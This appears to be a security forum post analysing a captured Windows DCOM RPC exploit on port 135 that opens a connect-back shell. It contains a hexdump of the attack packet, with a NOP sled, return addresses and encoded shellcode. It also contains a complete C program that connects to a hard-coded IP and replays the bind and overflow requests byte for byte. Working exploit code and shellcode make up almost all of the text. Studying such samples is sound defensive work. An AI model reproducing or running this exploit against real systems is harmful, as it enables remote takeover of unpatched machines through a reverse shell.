This problem is resolved.
Port 135
Exploits Dcom
this buddy exploits dcom, and uses connectback.
the ip & port to connectback are known, and we got decryption for them.
the problem is:
on after connecting we recv() 380 bytes, and have to send a 4 byte reply.
if this reply is correct, we get the binary.
the code to open the connectback shell.
=------------------[ hexdump(0x1bb87300 , 0x0000068a) ]-------------------= 0x0000 05 00 00 03 10 00 00 00 8a 06 00 00 00 00 00 00 ........ ........ 0x0010 72 06 00 00 00 00 00 00 05 00 01 00 00 00 00 00 r....... ........ 0x0020 00 00 00 00 58 7d 75 75 40 eb c6 47 bc 71 4e a7 ....X}uu @..G.qN. 0x0030 1c d0 b5 97 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 0x0040 00 00 00 00 00 00 00 00 00 00 09 00 00 03 00 00 ........ ........ 0x0050 00 00 00 00 00 03 00 00 5c 00 5c 00 90 90 90 90 ........ \.\..... 0x0060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0070 90 90 90 90 90 90 90 90 90 90 90 90 eb 10 eb 19 ........ ........ 0x0080 9f 75 18 00 23 37 f3 77 eb e0 fd 7f 90 90 90 90 .u..#7.w ........ 0x0090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x00a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x00b0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x00c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x00d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x00e0 90 90 90 90 eb 04 ff ff ff ff 90 90 90 90 90 90 ........ ........ 0x00f0 90 90 eb 04 eb 04 90 90 90 90 eb 04 ff ff ff ff ........ ........ 0x0100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0110 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0140 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0150 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0160 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0170 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0180 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0190 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x01a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x01b0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x01c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x01d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x01e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x01f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0200 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0210 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0220 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0230 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0240 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0250 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0260 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0270 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0280 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0290 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x02a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x02b0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x02c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x02d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x02e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x02f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0300 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0310 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0320 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0330 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0340 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0350 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0360 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 0x0370 90 90 90 90 90 90 90 eb 15 b9 8b e6 13 41 81 f1 ........ .....A.. 0x0380 d8 e7 13 41 5e 80 74 31 ff a2 e2 f9 eb 05 e8 e6 ...A^.t1 ........ 0x0390 ff ff ff 91 79 c6 29 e1 92 29 e2 ae 29 d2 be 0f ....y.). .)..)... 0x03a0 29 e2 aa f1 f1 ca 91 90 a2 a2 ca d5 d1 90 fd ca )....... ........ 0x03b0 d0 d6 a2 a2 ca cf d1 d4 c1 4a 96 a2 a2 a2 a3 a2 ........ .J...... 0x03c0 a2 a2 97 c0 aa 74 d6 81 82 36 62 3b 6b 68 1b fe .....t.. .6b;kh.. 0x03d0 b7 cb 1b e2 54 e2 75 a0 11 af 27 5b ef 66 3e b8 ....T.u. ..'[.f>. 0x03e0 a6 ba 21 a3 71 b8 62 a0 b1 a5 22 96 a1 a5 16 28 ..!.q.b. .."....( 0x03f0 9b 8a ff c8 a0 f9 29 5a f1 f1 29 f5 9e 29 f6 98 ......)Z ..)..).. 0x0400 da a1 75 f0 29 f0 82 a1 75 91 79 e1 29 96 38 a1 ..u.)... u.y.).8. 0x0410 55 91 6b 0e 90 6a 63 63 a7 0e 26 62 d7 54 29 d7 U.k..jcc ..&b.T). 0x0420 a2 89 ee 17 a2 d7 46 25 96 86 29 f4 86 a1 75 c4 ......F% ..)...u. 0x0430 29 ae f8 29 f4 be a1 75 29 a6 28 a1 65 fc 2b e6 )..)...u ).(.e.+. 0x0440 17 a2 5d e7 a2 f9 e9 d7 12 f9 21 61 a0 f6 5d f7 ..]..... ..!a..]. 0x0450 aa 21 66 aa 27 62 d7 3c 16 a0 89 42 28 66 f6 f2 .!f.'b.< ...B(f.. 0x0460 5d f7 be f2 f2 ca f6 10 17 bc ca a0 a2 41 8d 29 ]....... .....A.) 0x0470 5e f2 c8 a3 c8 a0 5d f7 82 29 7a c8 b2 f5 f1 5d ^.....]. .)z....] 0x0480 f7 86 27 62 d7 fb 65 e7 a2 a1 a2 a2 a2 f2 c8 a6 ..'b..e. ........ 0x0490 f7 f1 5d f7 8e 29 56 65 e7 a2 d5 c0 a2 a2 ca c7 ..]..)Ve ........ 0x04a0 da c7 a2 ca d6 d6 d6 8c 29 5e f7 f5 5d f7 ae 2b ........ )^..]..+ 0x04b0 e7 a2 c8 a2 ca a2 a0 a2 a2 f4 f1 5d f7 8a 27 62 ........ ...]..'b 0x04c0 d6 b3 da b9 5d d7 a2 f2 c8 a3 f4 5d f7 b2 21 66 ....]... ...]..!f 0x04d0 b2 49 7d 5d d7 a2 5d f7 b6 f2 f6 f5 5d f7 ba f1 .I}]..]. ....]... 0x04e0 5d f7 92 5d f7 a6 75 75 75 75 75 75 75 75 75 75 ]..]..uu uuuuuuuu 0x04f0 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x0500 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x0510 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x0520 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x0530 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x0540 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x0550 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x0560 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x0570 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x0580 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x0590 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x05a0 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x05b0 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x05c0 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x05d0 75 75 8b 45 30 05 24 fb ff ff ff e0 eb f4 75 75 uu.E0.$. ......uu 0x05e0 0b 0b 1b 00 75 75 75 75 75 75 75 75 75 75 75 75 ....uuuu uuuuuuuu 0x05f0 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x0600 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x0610 75 75 75 75 75 75 75 75 eb 06 75 75 59 1c 00 01 uuuuuuuu ..uuY... 0x0620 8b 44 24 fc 05 e0 fa ff ff ff e0 75 75 75 75 75 .D$..... ...uuuuu 0x0630 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu 0x0640 75 75 75 75 75 75 75 75 75 75 75 75 75 75 5c 00 uuuuuuuu uuuuuu\. 0x0650 41 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 A....... ........ 0x0660 00 00 00 00 01 00 00 00 68 1c 09 00 01 00 00 00 ........ h....... 0x0670 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 ........ .......F 0x0680 01 00 00 00 01 00 00 00 07 00 ........ .. =-------------------------------------------------------------------------=
#include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <netdb.h> #include <fcntl.h> #include <unistd.h> #include <sys/select.h> #include <ctype.h> #define HOSTNAME "123.23.23.23" #define PORT 135 unsigned char unknown_req1[] = { 0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0xd0,0x16,0xd0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00 ,0xb8,0x4a,0x9f,0x4d,0x1c,0x7d,0xcf,0x11,0x86,0x1e,0x00,0x20,0xaf,0x6e,0x7c,0x57 ,0x00,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00 ,0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00 }; unsigned char unknown_req2[] = {0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x8a,0x06,0x00,0x00,0x00,0x00,0x00,0x00 ,0x72,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x01,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x58,0x7d,0x75,0x75,0x40,0xeb,0xc6,0x47,0xbc,0x71,0x4e,0xa7 ,0x1c,0xd0,0xb5,0x97,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x09,0x00,0x00,0x03,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x5c,0x00,0x5c,0x00,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,0x10,0xeb,0x19 ,0x9f,0x75,0x18,0x00,0x23,0x37,0xf3,0x77,0xeb,0xe0,0xfd,0x7f,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0xeb,0x04,0xff,0xff,0xff,0xff,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0xeb,0x04,0xeb,0x04,0x90,0x90,0x90,0x90,0xeb,0x04,0xff,0xff,0xff,0xff ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 ,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,0x15,0xb9,0x8b,0xe6,0x13,0x41,0x81 ,0xf1,0x39,0xe6,0x13,0x41,0x5e,0x80,0x74,0x31,0xff,0x17,0xe2,0xf9,0xeb,0x05,0xe8 ,0xe6,0xff,0xff,0xff,0x24,0xcc,0x73,0x9c,0x54,0x27,0x9c,0x57,0x1b,0x9c,0x67,0x0b ,0xba,0x9c,0x6f,0x1f,0xff,0x52,0x17,0x17,0x17,0x44,0x41,0x9c,0x48,0x2b,0x9c,0x4b ,0x2c,0x6f,0x14,0xc8,0x44,0x9c,0x4c,0x37,0x14,0xc8,0x44,0x94,0xd4,0x13,0x9c,0x24 ,0x14,0xe0,0x24,0xde,0xbb,0x25,0xdf,0xd6,0xd6,0x12,0x93,0xd7,0x62,0xe1,0x3c,0xdd ,0x62,0xfe,0x4f,0x3c,0xcf,0xc6,0xfc,0x49,0x14,0x49,0x33,0x14,0xc8,0x71,0x9c,0x1c ,0x9c,0x49,0x0b,0x14,0xc8,0x9c,0x13,0x9c,0x14,0xd0,0x49,0x4c,0xe8,0xf7,0x49,0x7f ,0x24,0x25,0x17,0x17,0x7f,0x60,0x64,0x25,0x48,0x43,0xad,0x85,0x79,0x13,0x93,0xe8 ,0xc1,0x9c,0xef,0x96,0xfb,0x17,0x15,0x17,0x17,0x9c,0xfb,0x44,0x7d,0x16,0x7d,0x15 ,0xad,0x94,0x44,0x94,0x17,0xe8,0xc1,0x44,0x44,0x7f,0x29,0x38,0xce,0xe9,0x7f,0x15 ,0x17,0x2b,0x0e,0x9c,0xc3,0x9c,0xcf,0x7d,0x07,0x45,0x44,0xad,0x74,0x27,0x77,0x4d ,0xe8,0xc1,0x47,0xa3,0x15,0x47,0x42,0x44,0xad,0x17,0x4f,0x77,0xf5,0xe8,0xc1,0xa8 ,0xbb,0xbb,0x11,0x92,0xe8,0xf2,0x6c,0x79,0x73,0x65,0x7a,0x6c,0x64,0x6c,0x6a,0x64 ,0x71,0x66,0x70,0x6c,0x62,0x65,0x7a,0x71,0x79,0x71,0x76,0x76,0x79,0x6a,0x71,0x77 ,0x65,0x63,0x7a,0x75,0x6f,0x64,0x62,0x67,0x69,0x69,0x68,0x78,0x65,0x71,0x7a,0x6b ,0x75,0x6f,0x75,0x67,0x76,0x72,0x66,0x67,0x6b,0x75,0x6f,0x6d,0x6c,0x79,0x79,0x67 ,0x77,0x78,0x6f,0x6d,0x61,0x6c,0x72,0x6c,0x73,0x70,0x6a,0x63,0x64,0x73,0x6c,0x6c ,0x73,0x69,0x67,0x67,0x6b,0x66,0x73,0x71,0x6c,0x62,0x6a,0x6c,0x71,0x63,0x76,0x73 ,0x6e,0x78,0x6f,0x71,0x72,0x78,0x6f,0x76,0x63,0x73,0x75,0x70,0x70,0x6e,0x62,0x61 ,0x76,0x72,0x70,0x66,0x63,0x61,0x6a,0x66,0x67,0x76,0x68,0x76,0x71,0x7a,0x63,0x62 ,0x7a,0x63,0x66,0x65,0x78,0x6f,0x6e,0x68,0x68,0x61,0x70,0x66,0x6a,0x78,0x67,0x72 ,0x6d,0x68,0x70,0x6d,0x75,0x6c,0x75,0x62,0x6d,0x71,0x7a,0x72,0x6d,0x76,0x63,0x76 ,0x73,0x70,0x6a,0x79,0x68,0x61,0x62,0x63,0x76,0x76,0x71,0x68,0x78,0x63,0x6b,0x6f ,0x7a,0x6a,0x78,0x68,0x70,0x6f,0x76,0x63,0x66,0x74,0x61,0x74,0x71,0x61,0x66,0x62 ,0x74,0x68,0x67,0x75,0x61,0x74,0x72,0x75,0x6a,0x68,0x75,0x63,0x69,0x72,0x62,0x6b ,0x6a,0x67,0x64,0x70,0x6c,0x78,0x67,0x61,0x71,0x66,0x7a,0x67,0x67,0x71,0x63,0x6a ,0x62,0x69,0x79,0x6a,0x71,0x76,0x77,0x66,0x67,0x7a,0x74,0x69,0x72,0x77,0x6f,0x63 ,0x79,0x7a,0x8b,0x45,0x30,0x05,0x24,0xfb,0xff,0xff,0xff,0xe0,0xeb,0xf4,0x70,0x75 ,0x0b,0x0b,0x1b,0x00,0x6b,0x6a,0x69,0x68,0x74,0x70,0x6f,0x66,0x68,0x6c,0x65,0x65 ,0x77,0x72,0x61,0x79,0x78,0x6b,0x61,0x76,0x78,0x77,0x64,0x71,0x61,0x71,0x7a,0x76 ,0x77,0x67,0x62,0x77,0x65,0x67,0x6f,0x66,0x74,0x74,0x73,0x6d,0x77,0x6f,0x75,0x6e ,0x62,0x6d,0x6f,0x64,0x73,0x6d,0x78,0x6c,0xeb,0x06,0x6d,0x64,0x59,0x1c,0x00,0x01 ,0x8b,0x44,0x24,0xfc,0x05,0xe0,0xfa,0xff,0xff,0xff,0xe0,0x6d,0x75,0x6a,0x64,0x6b ,0x75,0x63,0x69,0x77,0x65,0x63,0x74,0x61,0x75,0x64,0x70,0x73,0x66,0x68,0x67,0x69 ,0x62,0x67,0x63,0x75,0x72,0x66,0x6a,0x6a,0x6e,0x6e,0x78,0x72,0x78,0x66,0x5c,0x00 ,0x41,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x68,0x1c,0x09,0x00,0x01,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 ,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x07,0x00}; typedef unsigned int uint; typedef unsigned char byte; void hexdump(byte *data, uint len) { char conv[] = "0123456789abcdef"; printf("=------------------[ hexdump(0x%08x , 0x%08x) ]-------------------=\n", (unsigned int)data, len); for( unsigned int i = 0; i < len; i += 0x10 ) { printf("0x%04x ", i); for( unsigned int j = 0; j < 0x10; j++ ) { if( i + j < len ) { printf("%c%c ",conv[((data[i + j] & 0xFF) >> 4)],conv[((data[i + j] & 0xff) & 0x0F)]); } else printf(" "); if( j == 7 ) printf(" "); } printf(" "); for( unsigned int j = 0; j < 0x10; j++ ) { if( i + j < len ) printf("%c", isprint(data[i + j]) ? data[i + j] : '.'); else printf(" "); if( j == 7 ) printf(" "); } printf("\n"); } printf("=-------------------------------------------------------------------------=\n"); } char *getreply(int sockfd,int timeout) { printf("[*] Trying to receive a reply \n"); char rb[1500]; fd_set fdreadme; int i; struct timeval tv; tv.tv_sec = 10; tv.tv_usec = 0; FD_ZERO(&fdreadme); FD_SET(sockfd, &fdreadme); FD_SET(sockfd, &fdreadme); FD_SET(0, &fdreadme); if(select(FD_SETSIZE, &fdreadme, NULL, NULL, &tv) < 0 ) { return NULL; } if(FD_ISSET(sockfd, &fdreadme)) { if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0) { printf("[-] Connection lost..\n"); exit(1); }else { printf("\t[+] got %i bytes of data \n",i); hexdump((byte *)rb,i); } } return NULL; } int senddata(int sockfd,unsigned char *data,int len) { int sended=0; if ( (sended = send(sockfd,data,len,0)) != len ) { printf("\t[-] Could not send complete data (%i < %i)\n",sended,len); } else { printf("\t[+] Sended Request \n"); } return sended; } int main() { struct hostent *he; struct sockaddr_in their_addr; int sockfd=-1; printf("[*]Resolving Hostname %s \n",HOSTNAME); if((he = gethostbyname(HOSTNAME)) == NULL) { printf("\t[-] gethostbyname: Couldnt resolve hostname\n"); exit(1); } printf("\t[+] Done. (%s) \n", inet_ntoa(*((struct in_addr *)he->h_addr))); printf("[*] Connecting Server \n"); their_addr.sin_family = AF_INET; their_addr.sin_addr = *((struct in_addr *)he->h_addr); their_addr.sin_port = htons(PORT); if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("\t[-] Socket failed"); return(0); } else { printf("\t[+] created Socket \n"); } if ( connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1 ) { perror("\t[-] Connect failed"); return(0); } else { printf("\t[+] Connected ...\n"); } printf("[*] Sending Request #1 (%i bytes)\n",sizeof(unknown_req1)); senddata(sockfd,unknown_req1,sizeof(unknown_req1)); getreply(sockfd,0); printf("[*] Sending Request #2 (%i bytes)\n",sizeof(unknown_req2)); senddata(sockfd,unknown_req2,sizeof(unknown_req2)); getreply(sockfd,0); printf("[*] Closing Socket \n"); printf("\t[+] done (%i)\n",close(sockfd)); return 0; }
